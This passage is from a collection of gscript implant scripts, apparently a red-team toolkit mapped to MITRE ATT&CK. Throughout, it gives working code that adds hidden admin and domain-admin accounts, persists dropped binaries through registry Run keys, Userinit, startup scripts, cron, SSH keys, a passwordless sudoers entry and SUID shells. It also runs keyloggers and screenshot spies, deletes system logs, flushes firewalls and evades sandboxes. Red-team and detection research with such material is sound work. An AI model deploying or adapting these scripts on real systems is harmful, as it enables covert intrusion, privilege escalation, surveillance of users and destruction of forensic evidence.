16 | G.exec.ExecuteCommandAsync("net.exe", ["user", "spoderman", "TheAmazing", "/add", "/fullname:Spoder Man"]);
17 | console.log("Added a local user spoderman");
18 |
19 | // Add a domain user
20 | G.exec.ExecuteCommandAsync("net.exe", ["user", "spoderman", "TheAmazing", "/add", "/fullname:Spoder Man", "/domain"]);
21 | console.log("Added a domain user spoderman");
22 |
23 | // Add the user to Adminsistrators group
24 | G.exec.ExecuteCommandAsync("net.exe", ["group", "Administrators", "spoderman", "/add"]);
25 | console.log("Added spoderman to the Administrators group");
26 |
27 | // Add the user to the Domain Adminsistrators group
28 | G.exec.ExecuteCommandAsync("net.exe", ["group", "Domain Admins", "spoderman", "/add", "/domain"]);
29 | console.log("Added spoderman to the Domain Administrators group");
30 |
31 | // Add the user to the Domain Adminsistrators group
32 | G.exec.ExecuteCommandAsync("net.exe", ["localgroup", "Administrators", "spoderman", "/add"]);
33 | console.log("Added spoderman to the local Administrators group");
34 |
35 | // Removed the local user spoderman
36 | G.exec.ExecuteCommandAsync("net.exe", ["user", "spoderman", "/delete"]);
37 | console.log("Removed the local user spoderman");
38 |
39 | // Removed the domain user spoderman
40 | G.exec.ExecuteCommandAsync("net.exe", ["user", "spoderman", "/delete", "/domain"]);
41 | console.log("Removed the local user spoderman");
42 |
43 | console.log("done Net User Creation");
44 |
45 | return true;
46 | }
47 |
--------------------------------------------------------------------------------
/attack/windows/netntlm_downgrade.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: NetNTLM Downgrade
3 | // Author: ahhh
4 | // Purpose: Force LM and NT hashes during SMB auth
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Notes: Works in conjunction with smb relying https://attack.mitre.org/wiki/Technique/T1187
8 |
9 | //priority:97
10 | //timeout:150
11 |
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 |
14 | function Deploy() {
15 | console.log("Starting NetNTLM Downgrade");
16 |
17 | var value = 0;
18 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "SYSTEM\\CurrentControlSet\\Control\\Lsa", "lmcompatibilitylevel", value);
19 |
20 | console.log("Done NetNTLM Downgrade");
21 | return true;
22 | }
23 |
--------------------------------------------------------------------------------
/attack/windows/runkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: CurrentVersion Run Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a CurrentVersion\Run regkey
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1112
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 |
14 | //import:/private/tmp/example.exe
15 |
16 | function Deploy() {
17 | console.log("starting execution of Run Key Persistence");
18 | // Prep the sample
19 | var example = GetAssetAsBytes("example.exe");
20 | var temppath = os.TempDir();
21 | var naming = G.rand.GetAlphaString(5);
22 | naming = naming.toLowerCase();
23 | var fullpath = temppath+"\\"+naming+".exe";
24 |
25 | // Drop the sample
26 | console.log("file name: "+ fullpath);
27 | errors = G.file.WriteFileFromBytes(fullpath, example[0]);
28 | console.log("errors: "+errors);
29 |
30 | // Persist the sample
31 | windows.AddRegKeyString("CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "ExampleExe", fullpath);
32 | console.log("Adding a reg key for current user run");
33 |
34 | // Execute the sample
35 | //var running = G.exec.ExecuteCommandAsync("fullpath", [""]);
36 | //console.log("executed the example binary, errors: " + Dump(running[1]));
37 | console.log("done, deployed binary with run key persistence");
38 | return true;
39 | }
40 |
--------------------------------------------------------------------------------
/attack/windows/salt_install.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Salt Minion Example
3 | // Author: ahhh
4 | // Purpose: Drops Salt Minion installer as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Includes:
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //import:bootstrap-salt.ps1
13 |
14 | //go_import:os as os
15 |
16 | function Deploy() {
17 | console.log("Starting to drop salt installer");
18 | // Getting our asset
19 | var saltBin = GetAssetAsBytes("bootstrap-salt.ps1");
20 | console.log("errors: "+Dump(saltBin[1]));
21 |
22 | // Write our salt installer file
23 | fullpath = "C:\\salt.ps1";
24 | console.log("file name: "+ fullpath);
25 | errors = G.file.WriteFileFromBytes(fullpath, saltBin[0]);
26 | console.log("errors: "+Dump(errors));
27 |
28 | // Get Hostname
29 | var obj = os.Hostname();
30 |
31 | // Run install
32 | var running = G.exec.ExecuteCommand("powershell", [fullpath, "-minion", obj[0], "-master", ""]);
33 | console.log("errors: "+Dump(running[1]));
34 |
35 | return true
36 | }
37 |
--------------------------------------------------------------------------------
/attack/windows/screenshot_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every halfhour for the next 24 hours (48 x 1800)
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Using GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/GoRedSpy.exe
12 | //go_import:os as os
13 |
14 | function Deploy() {
15 | console.log("Starting GoRedSpy");
16 |
17 | // Prep the sample
18 | var spy = GetAssetAsBytes("GoRedSpy.exe");
19 | var temppath = os.TempDir();
20 | var naming = G.rand.GetAlphaString(5);
21 | naming = naming.toLowerCase();
22 | var fullpath = temppath+"\\"+naming+".exe";
23 |
24 | // Drop the sample
25 | console.log("file name: "+ fullpath);
26 | errors = G.file.WriteFileFromBytes(fullpath, spy[0]);
27 | console.log("errors: "+errors);
28 |
29 | // Run the sample
30 | var running = G.exec.ExecuteCommandAsync(fullpath, ["-outDir", temppath, "-count", "48", "-delay", "1800s"]);
31 | console.log("errors running: "+running[1]);
32 |
33 | console.log("Done GoRedSpy");
34 | return true;
35 | }
36 |
--------------------------------------------------------------------------------
/attack/windows/shrink_logsize.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Shrink Logsize
3 | // Author: ahhh
4 | // Purpose: This will shrink the max logsize of the windows event logs to a single byte
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:93
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 |
14 | function Deploy() {
15 | console.log("Starting execution of Shrink Logsize");
16 |
17 | var value = 0x00001
18 | // shrink the logs
19 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "Software\\Policies\\Microsoft\\Windows\\EventLog\\Application", "MaxSize", value);
20 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "Software\\Policies\\Microsoft\\Windows\\EventLog\\Security", "MaxSize", value);
21 | windows.AddRegKeyDWORD("LOCAL_MACHINE", "Software\\Policies\\Microsoft\\Windows\\EventLog\\System", "MaxSize", value);
22 |
23 | console.log("Done Shrink Logsize");
24 | return true;
25 | }
26 |
--------------------------------------------------------------------------------
/attack/windows/startup_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Startup Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a script in the Startup folder
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1060
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.exe
11 | //go_import:os as os
12 |
13 | function Deploy() {
14 | console.log("starting execution of Startup Persistence");
15 |
16 | // Prep the sample
17 | var example = GetAssetAsBytes("example.exe");
18 | var temppath = os.TempDir();
19 | var naming = G.rand.GetAlphaString(5);
20 | naming = naming.toLowerCase();
21 | var fullpath = temppath+"\\"+naming+".exe";
22 |
23 | // Drop the sample
24 | console.log("file name: "+ fullpath);
25 | errors = G.file.WriteFileFromBytes(fullpath, example[0]);
26 | console.log("errors: "+errors);
27 |
28 | // Persist the sample
29 | var cmd = "powershell.exe -NoLogo -WindowStyle hidden -ep bypass " + fullpath;
30 | var fn2 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\start.bat";
31 | G.file.WriteFileFromString(fn2, cmd);
32 | console.log("persisted the example binary using bat / powershell script in StartUp folder");
33 |
34 | // Execute the sample
35 | //var running = G.exec.ExecuteCommandAsync("powershell", ["-NoLogo", "-WindowStyle", "hidden", "-ep", "bypass", fn]);
36 | //console.log("executed the example binary, errors: "+running[1]);
37 |
38 | console.log("done, deployed binary with startup persistence");
39 | return true;
40 | }
41 |
--------------------------------------------------------------------------------
/attack/windows/userinit_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: User Init Persistence
3 | // Author: ahhh
4 | // Purpose: User Init Persistence
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 |
14 | //import:/private/tmp/example.exe
15 |
16 | function Deploy() {
17 | console.log("starting execution of Run Key Persistence");
18 | // Prep the sample
19 | var example = GetAssetAsBytes("example.exe");
20 | var temppath = os.TempDir();
21 | var naming = G.rand.GetAlphaString(5);
22 | naming = naming.toLowerCase();
23 | var fullpath = temppath+"\\"+naming+".exe";
24 |
25 | // Drop the sample
26 | console.log("file name: "+ fullpath);
27 | errors = G.file.WriteFileFromBytes(fullpath, example[0]);
28 | console.log("errors: "+errors);
29 |
30 | // Persist the sample
31 | windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit", fullpath);
32 | console.log("Adding a reg key for current user run");
33 |
34 | // Execute the sample
35 | //var running = G.exec.ExecuteCommandAsync("fullpath", [""]);
36 | //console.log("executed the example binary, errors: " + Dump(running[1]));
37 | console.log("done, deployed binary with run key persistence");
38 | return true;
39 | }
40 |
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_cpu1.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_CPU_1
3 | // Author: ahhh
4 | // Purpose: Gets the computer's CPU count, if the machine only has one cpu we consider it a sandbox
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:50
9 | //timeout:75
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Testing Sandbox CPUs!");
13 | var well = CheckIfCPUCountIsHigherThanOne();
14 | if (well.areWeInASandbox) {
15 | LogInfo("Detected a single CPU, likly a sandbox!");
16 | KillSelf();
17 | return false;
18 | } else {
19 | return true;
20 | }
21 | return true;
22 | }
23 |
24 | function Deploy() {
25 | return true;
26 | }
27 |
28 | function AfterDeploy() {
29 | LogInfo("Done Testing Sandbox CPUs!");
30 | return true;
31 | }
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_hostname.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Hostname
3 | // Author: ahhh
4 | // Purpose: Gets the computers hostname, converts it to caps, then checks against a list of well known sandbox hostnames
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:30
9 | //timeout:75
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Testing Sandbox Hostname!");
13 | var obj = GetHost();
14 | var host = (obj.hostname).toUpperCase();
15 | LogInfo("Our hostname is: "+ host);
16 | if (host == "TEQUILABOOMBOOM" || host == "SANDBOX" || host == "VIRUS" || host == "MALWARE" || host == "MALTEST" || host == "PC" || host == "PSPUBWS-PC")
17 | {
18 | LogInfo("Sandbox detected, exiting");
19 | KillSelf();
20 | return false;
21 | }
22 | return true;
23 | }
24 |
25 | function Deploy() {
26 | return true;
27 | }
28 |
29 | function AfterDeploy() {
30 | LogInfo("Done Testing Hostname!");
31 | return true;
32 | }
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_ram1.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_RAM
3 | // Author: ahhh
4 | // Purpose: Gets the computer's allocated RAM, if the machine only has one 1GB or less we call it a sandbox
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:50
9 | //timeout:100
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Testing Sandbox RAM!");
13 | var well = CheckIfRAMAmountIsBelow1GB();
14 | if (well.areWeInASandbox) {
15 | LogInfo("Detected a single CPU, likly a sandbox!");
16 | KillSelf();
17 | return false;
18 | } else {
19 | return true;
20 | }
21 | return true;
22 | }
23 |
24 | function Deploy() {
25 | return true;
26 | }
27 |
28 | function AfterDeploy() {
29 | LogInfo("Done Testing Sandbox RAM!");
30 | return true;
31 | }
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_users.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Users
3 | // Author: ahhh
4 | // Purpose: Gets the computer's Users, checks against a list of well known sandbox users
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:50
9 | //timeout:80
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Testing Sandbox Users!");
13 | var well = CheckSandboxUsernames();
14 | if (well.areWeInASandbox) {
15 | LogInfo("Detected Common Sandbox Users!");
16 | KillSelf();
17 | return false;
18 | } else {
19 | return true;
20 | }
21 | return true;
22 | }
23 |
24 | function Deploy() {
25 | return true;
26 | }
27 |
28 | function AfterDeploy() {
29 | LogInfo("Done Testing Users!");
30 | return true;
31 | }
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_users2.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Users2
3 | // Author: ahhh
4 | // Purpose: Gets the computer's Users, checks against a dynamic list of well known sandbox users
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:30
9 | //timeout:75
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Testing Sandbox Users 2!");
13 | var obj = Getuser();
14 | var user = (obj.username).toUpperCase();
15 | LogInfo(user);
16 | if (user == "MALTEST" || user == "TEQUILABOOMBOOM" || user == "WILBER" || user == "PSPUBWS")
17 | {
18 | LogInfo("Sandbox detected, exiting");
19 | KillSelf();
20 | return false;
21 | }
22 | return true;
23 | }
24 |
25 | function Deploy() {
26 | return true;
27 | }
28 |
29 | function AfterDeploy() {
30 | LogInfo("Done Testing Users 2!");
31 | return true;
32 | }
--------------------------------------------------------------------------------
/beta/anti-re/windows/vm_regkeys.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Virtual Machine Registry Keys
3 | // Author: ahhh
4 | // Purpose: Looks to see if registry keys exist that indicate the current host is a virtual machine
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:10
9 | //timeout:100
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Testing for virtual machine regkeys!");
13 | var VMWare_val = QueryRegKey("LOCAL_MACHINE", "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "VMWare User Process");
14 | if (VMWare_val.keyValue == "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr" ){
15 | LogInfo("VMware Tools detected, exiting");
16 | KillSelf();
17 | return false;
18 | }
19 | var VMWare_val2 = QueryRegKey("CURRENT_USER", "Software\\VMware, Inc.\\VMware Tools\\RegistryBackup\\DisplayScaling_DPI", "backupType");
20 | if (VMWare_val2.keyValue == "created" ){
21 | LogInfo("VMware Tools detected, exiting");
22 | KillSelf();
23 | return false;
24 | }
25 | var system_manu_val = QueryRegKey("LOCAL_MACHINE", "Hardware\\Description\\System\\BIOS", "SystemManufacturer");
26 | if (system_manu_val.keyValue == "VMware, Inc." ){
27 | LogInfo("VMware detected, exiting");
28 | KillSelf();
29 | return false;
30 | }
31 | var system_product_val = QueryRegKey("LOCAL_MACHINE", "Hardware\\Description\\System\\BIOS", "SystemProductName");
32 | if (system_product_val.keyObj.StringVal == "VMware Virtual Platform" ){
33 | LogInfo("VMware detected, exiting");
34 | KillSelf();
35 | return false;
36 | }
37 | var vbox_val = QueryRegKey("LOCAL_MACHINE", "Hardware\\Description\\System", "VideoBiosVersion");
38 | if (vbox_val.keyObj.StringVal == "VIRTUALBOX" ){
39 | LogInfo("VirtualBox detected, exiting");
40 | KillSelf();
41 | return false;
42 | }
43 | var key_val = QueryRegKey("LOCAL_MACHINE", "Hardware\\Description\\System", "SystemBiosVersion");
44 | if (key_val.keyObj.StringVal == "VBOX" || key_val == "QEMU" || key_val == "BOCHS" ){
45 | LogInfo("VirtualBox detected, exiting");
46 | KillSelf();
47 | return false;
48 | }
49 | return true;
50 | }
51 |
52 | function Deploy() {
53 | return true;
54 | }
55 |
56 | function AfterDeploy() {
57 | LogInfo("Done Testing vm regkeys!");
58 | return true;
59 | }
--------------------------------------------------------------------------------
/beta/attack/README.md:
--------------------------------------------------------------------------------
1 | **ATT&CK techniques implemented in gscripts**
2 |
3 | [ATT&CK Technique Matrix](https://attack.mitre.org/wiki/Technique_Matrix)
4 |
5 | [gscript examples with ATT&CK](http://lockboxx.blogspot.com/2018/05/gscript-examples-with-att.html)
6 |
--------------------------------------------------------------------------------
/beta/attack/linux/delete_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Logs
3 | // Author: ahhh
4 | // Purpose: Deletes a number of critical security logs on a linux machine, to see if this is detected by the lack of logs or deletion
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1146
7 | // Note: must run implant as root
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | function BeforeDeploy() {
13 | LogInfo("starting execution of Delete Logs");
14 | var well = GetUser();
15 | LogInfo("Our user is: "+well.username);
16 | if (well.username == "root") {
17 | return true;
18 | } else {
19 | LogInfo("Detected a non-root user, this needs to run as root!");
20 | Halt();
21 | return false;
22 | }
23 | return true;
24 | }
25 |
26 | function Deploy() {
27 | //rm -rf /var/run/utmp /var/run/wtmp /var/run/btmp /var/log/
28 | ForkExecuteCommand("rm", ["-rf", "/var/run/utmp", "/var/run/wtmp", "/var/run/btmp", "/var/log/"]);
29 | LogInfo("Removed /var/run/utmp, /var/run/wtmp, /var/run/btmp, and all of /var/log/");
30 | ForkExecuteCommand("history", ["-c"]);
31 | LogInfo("Cleared the bash history");
32 | return true;
33 | }
34 |
35 | function AfterDeploy() {
36 | LogInfo("done Delete Logs");
37 | return true;
38 | }
--------------------------------------------------------------------------------
/beta/attack/linux/disable_linux_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Linux Firewall
3 | // Author: ahhh
4 | // Purpose: Drops the linux firewall by dropping all of the iptables rules
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Starting Disable Linux Firewall");
13 | return true;
14 | }
15 |
16 | function Deploy() {
17 | var response = ExecuteCommand("iptables", ["-L"]);
18 | LogInfo(response.retObject.Stdout);
19 |
20 | var response2 = ExecuteCommand("iptables", ["--flush"]);
21 | LogInfo(response2.retObject.Stdout);
22 | return true;
23 | }
24 |
25 | function AfterDeploy() {
26 | LogInfo("Done Disable Linux Firewall");
27 | return true;
28 | }
--------------------------------------------------------------------------------
/beta/attack/linux/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Starts recording keylogs, saves them in /var/log/skeylogger
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using this keylogger: https://github.com/gsingh93/simple-key-logger
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/keylogger.elf
12 |
13 |
14 | function BeforeDeploy() {
15 | LogInfo("Starting keylogger spy");
16 | var well = GetUser();
17 | LogInfo("Our user is: "+well.username);
18 | if (well.username == "root") {
19 | return true;
20 | } else {
21 | LogInfo("Detected a non-root user, this needs to run as root!");
22 | Halt();
23 | return false;
24 | }
25 | return true;
26 | }
27 |
28 | function Deploy() {
29 | // Drop the sample
30 | var spy = Asset("keylogger.elf");
31 | var name = "";
32 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
33 | for (var i = 0; i < 6; i++)
34 | name += possible.charAt(Math.floor(Math.random() * possible.length));
35 | name = "/tmp/"+name;
36 | WriteFile(name, spy.fileData, 0755);
37 | LogInfo("dropped the spy binary here: "+name);
38 |
39 | ForkExecuteCommand(name, [""]);
40 | return true;
41 | }
42 |
43 | function AfterDeploy() {
44 | LogInfo("Done keylogger spy");
45 | return true;
46 | }
47 |
--------------------------------------------------------------------------------
/beta/attack/linux/screenshot_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every halfhour for the next 24 hours (48 x 1800)
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Using GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/GoRedSpy.elf
12 |
13 |
14 | function BeforeDeploy() {
15 | LogInfo("Starting GoRedSpy");
16 | return true;
17 | }
18 |
19 | function Deploy() {
20 | // Drop the sample
21 | var spy = Asset("GoRedSpy.elf");
22 | var name = "";
23 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
24 | for (var i = 0; i < 5; i++)
25 | name += possible.charAt(Math.floor(Math.random() * possible.length));
26 | name = "/tmp/"+name;
27 | WriteFile(name, spy.fileData, 0755);
28 | LogInfo("dropped the spy binary here: "+name);
29 |
30 | ForkExecuteCommand(name, ["-outDir", "/tmp/", "-count", "48", "-delay", "1800s"]);
31 | return true;
32 | }
33 |
34 | function AfterDeploy() {
35 | LogInfo("Done GoRedSpy");
36 | return true;
37 | }
38 |
--------------------------------------------------------------------------------
/beta/attack/linux/sshkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Title: SSH Key Persistence
2 | // Author: micahjmartin
3 | // Purpose: add a public ssh key to users accounts
4 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1145
5 |
6 | //import:/root/.ssh/id_rsa.pub
7 |
8 | // NOTE: You will need to update the path to the public key in order to import without an error
9 |
10 | function BeforeDeploy() {
11 | return true;
12 | }
13 |
14 | function Deploy() {
15 | var filename = USER_INFO.home_dir + "/.ssh/authorized_keys";
16 | var stat = FileExists(filename);
17 | if (stat.fileExists) {
18 | LogInfo("SSH key appended");
19 | AppendFileBytes(filename, Asset("id_rsa.pub").fileData);
20 | } else {
21 | LogInfo("SSH key added");
22 | WriteFile(filename, Asset("id_rsa.pub").fileData, 400);
23 | }
24 | return true;
25 | }
26 |
27 | function AfterDeploy() {
28 | return true;
29 | }
30 |
--------------------------------------------------------------------------------
/beta/attack/linux/sudo_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sudo Persistence
3 | // Author: ahhh
4 | // Purpose: adds everyone to the sudo group so they can easily priv esc
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1169
7 | // Note: must run implant as root
8 |
9 | //priority:100
10 | //timeout:150
11 |
12 | function BeforeDeploy() {
13 | LogInfo("starting execution of Sudo Persistence");
14 | var well = GetUser();
15 | LogInfo("Our user is: "+well.username);
16 | if (well.username == "root") {
17 | return true;
18 | } else {
19 | LogInfo("Detected a non-root user, this needs to run as root!");
20 | Halt();
21 | return false;
22 | }
23 | return true;
24 | }
25 |
26 | function Deploy() {
27 | // setting ALL to be able to sudo on every command
28 | // echo 'ALL ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
29 | // echo 'ALL ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers.d/README
30 |
31 | var sudo_bytes = StringToByteArray("ALL ALL=(ALL:ALL) NOPASSWD:ALL");
32 | var obj = AppendFileBytes("/etc/sudoers", sudo_bytes);
33 | LogInfo(obj.fileError);
34 | var obj2 = AppendFileBytes("/etc/sudoers.d/README", sudo_bytes);
35 | LogInfo(obj2.fileError);
36 | LogInfo("Set ALL to be able to sudo on every command ");
37 |
38 | return true;
39 | }
40 |
41 | function AfterDeploy() {
42 | LogInfo("done Sudo Persistence");
43 | return true;
44 | }
--------------------------------------------------------------------------------
/beta/attack/linux/suid_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: SUID Persistence
3 | // Author: ahhh
4 | // Purpose: sets the sticky bit on bash as root, for easy future priv esc
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1166
7 | // Note: must run implant as root, later need to invoke "/bin/bash -p" to use SUID backdoor
8 |
9 | //priority:100
10 | //timeout:150
11 |
12 | function BeforeDeploy() {
13 | LogInfo("starting execution of SUID Persistence");
14 | var well = GetUser();
15 | LogInfo("Our user is: "+well.username);
16 | if (well.username == "root") {
17 | return true;
18 | } else {
19 | LogInfo("Detected a non-root user, this needs to run as root!");
20 | Halt();
21 | return false;
22 | }
23 | return true;
24 | }
25 |
26 | function Deploy() {
27 | // setting /bin/bash to U+S
28 | ForkExecuteCommand("chmod", ["u+s", "/bin/bash"]);
29 | ForkExecuteCommand("chmod", ["u+x", "/bin/bash"]);
30 | LogInfo("Set /bin/bash");
31 |
32 | // setting /bin/zsh to U+S
33 | ForkExecuteCommand("chmod", ["u+s", "/usr/bin/find"]);
34 | ForkExecuteCommand("chmod", ["u+x", "/usr/bin/find"]);
35 | LogInfo("Set /bin/zsh");
36 |
37 | // setting awk
38 | // USAGE: awk '{ system("/bin/sh") }'
39 | ForkExecuteCommand("chmod", ["u+s", "/usr/bin/awk"]);
40 | ForkExecuteCommand("chmod", ["u+x", "/usr/bin/awk"]);
41 | LogInfo("Set /usr/bin/awk");
42 |
43 | return true;
44 | }
45 |
46 | function AfterDeploy() {
47 | LogInfo("done SUID Persistence");
48 | return true;
49 | }
50 |
--------------------------------------------------------------------------------
/beta/attack/os_x/cronjob_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Persistence_osx_cronjob
3 | // Author: Jay Hill
4 | // Purpose: cron job persistence on osx
5 | // Gscript version: 0.1.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1168
7 |
8 | //priority:150
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
12 | function BeforeDeploy() {
13 | LogInfo("Start Cron Job on Osx");
14 | return true;
15 | }
16 |
17 | function Deploy() {
18 |
19 | // Drop the Sample
20 | var example = Asset("example.macho");
21 | var name = "";
22 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
23 | for (var i = 0; i < 5; i++)
24 | name += possible.charAt(Math.floor(Math.random() * possible.length));
25 | name = "/private/tmp/"+name;
26 | WriteFile(name, example.fileData, 0755);
27 | LogInfo("dropped the example binary here: "+name);
28 |
29 | // Shim Command
30 | var shim_command = 'say "bingo"\r\n';
31 | var shim_bytes = StringToByteArray("* * * * * "+shim_command);
32 |
33 | // Write the Cron Command
34 | var cron_bytes = StringToByteArray("* * * * * "+name);
35 | WriteFile("/tmp/pe", shim_bytes, 0755);
36 |
37 | // Issue the Cron Command
38 | ExecuteCommand("crontab", ["/tmp/pe"]);
39 | return true;
40 | }
41 |
42 | function AfterDeploy() {
43 | LogInfo("Done Cron Job on Osx");
44 | return true;
45 | }
46 |
--------------------------------------------------------------------------------
/beta/attack/os_x/delete_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Logs
3 | // Author: Jay Hill
4 | // Purpose: Deletes a number of critical security logs on a linux machine, to see if this is detected by the lack of logs or deletion
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1146
7 | // Note: must run implant as root
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | function BeforeDeploy() {
13 | LogInfo("starting execution of Delete Logs");
14 | var well = GetUser();
15 | LogInfo("Our user is: "+well.username);
16 | if (well.username == "root") {
17 | return true;
18 | } else {
19 | LogInfo("Detected a non-root user, this needs to run as root!");
20 | Halt();
21 | return false;
22 | }
23 | return true;
24 | }
25 |
26 | function Deploy() {
27 | //rm -rf /var/run/utmp /var/run/wtmp /var/run/btmp /var/log/
28 | ForkExecuteCommand("rm", ["-rf", "-P", "/var/run/utmp", "/var/run/wtmp", "/var/run/btmp", "/var/log/"]);
29 | LogInfo("Removed /var/run/utmp, /var/run/wtmp, /var/run/btmp, and all of /var/log/");
30 | ForkExecuteCommand("rm", ["-rf", "-P", "/var/root/.sh_history"]);
31 | LogInfo("Cleared the root bash history");
32 | return true;
33 | }
34 |
35 | function AfterDeploy() {
36 | LogInfo("done Delete Logs");
37 | return true;
38 | }
39 |
--------------------------------------------------------------------------------
/beta/attack/os_x/enable_remote_ssh.gs:
--------------------------------------------------------------------------------
1 | // enable remote ssh
2 | // Title: enable remote ssh
3 | // Author: jayhill
4 | // Purpose:To quickly turn on SSH server and allow incoming ssh connections to the current Mac.
5 | // Gscript version: 0.1.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1021
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Enabling remoteSSH connection");
13 | var well = GetUser();
14 | LogInfo("Our user is: "+well.username);
15 | if (well.username == "root") {
16 | return true;
17 | } else {
18 | LogInfo("Detected a non-root user, this needs to run as root!");
19 | Halt();
20 | return false;
21 | }
